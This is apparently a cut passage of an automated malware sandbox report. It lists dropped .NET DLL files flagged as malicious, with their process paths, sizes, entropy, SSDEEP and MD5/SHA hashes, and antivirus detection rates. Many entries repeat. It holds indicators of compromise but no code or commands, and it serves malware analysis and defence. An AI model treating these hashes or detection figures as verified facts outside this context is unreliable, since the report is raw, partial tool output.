                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 24%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):22016
                                                        Entropy (8bit):5.41854385721431
                                                        Encrypted:false
                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):5.932541123129161
                                                        Encrypted:false
                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):5.932541123129161
                                                        Encrypted:false
                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.492504448438552
                                                        Encrypted:false
                                                        SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                        MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                        SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                        SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                        SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 33%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):46592
                                                        Entropy (8bit):5.870612048031897
                                                        Encrypted:false
                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24576
                                                        Entropy (8bit):5.535426842040921
                                                        Encrypted:false
                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 13%
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34816
                                                        Entropy (8bit):5.636032516496583
                                                        Encrypted:false
                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33792
                                                        Entropy (8bit):5.541771649974822
                                                        Encrypted:false
                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 38%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):22016
                                                        Entropy (8bit):5.41854385721431
                                                        Encrypted:false
                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):46592
                                                        Entropy (8bit):5.870612048031897
                                                        Encrypted:false
                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):294912
                                                        Entropy (8bit):6.010605469502259
                                                        Encrypted:false
                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):5.932541123129161
                                                        Encrypted:false
                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38912
                                                        Entropy (8bit):5.679286635687991
                                                        Encrypted:false
                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33280
                                                        Entropy (8bit):5.634433516692816
                                                        Encrypted:false
                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):5.932541123129161
                                                        Encrypted:false
                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24576
                                                        Entropy (8bit):5.535426842040921
                                                        Encrypted:false
                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 13%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):342528
                                                        Entropy (8bit):6.170134230759619
                                                        Encrypted:false
                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33792
                                                        Entropy (8bit):5.541771649974822
                                                        Encrypted:false
                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 38%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):64000
                                                        Entropy (8bit):5.857602289000348
                                                        Encrypted:false
                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24576
                                                        Entropy (8bit):5.535426842040921
                                                        Encrypted:false
                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 13%
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):36352
                                                        Entropy (8bit):5.668291349855899
                                                        Encrypted:false
                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.660491370279985
                                                        Encrypted:false
                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                        MD5:240E98D38E0B679F055470167D247022
                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):64000
                                                        Entropy (8bit):5.857602289000348
                                                        Encrypted:false
                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):22016
                                                        Entropy (8bit):5.41854385721431
                                                        Encrypted:false
                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):64000
                                                        Entropy (8bit):5.857602289000348
                                                        Encrypted:false
                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):342528
                                                        Entropy (8bit):6.170134230759619
                                                        Encrypted:false
                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38400
                                                        Entropy (8bit):5.699005826018714
                                                        Encrypted:false
                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
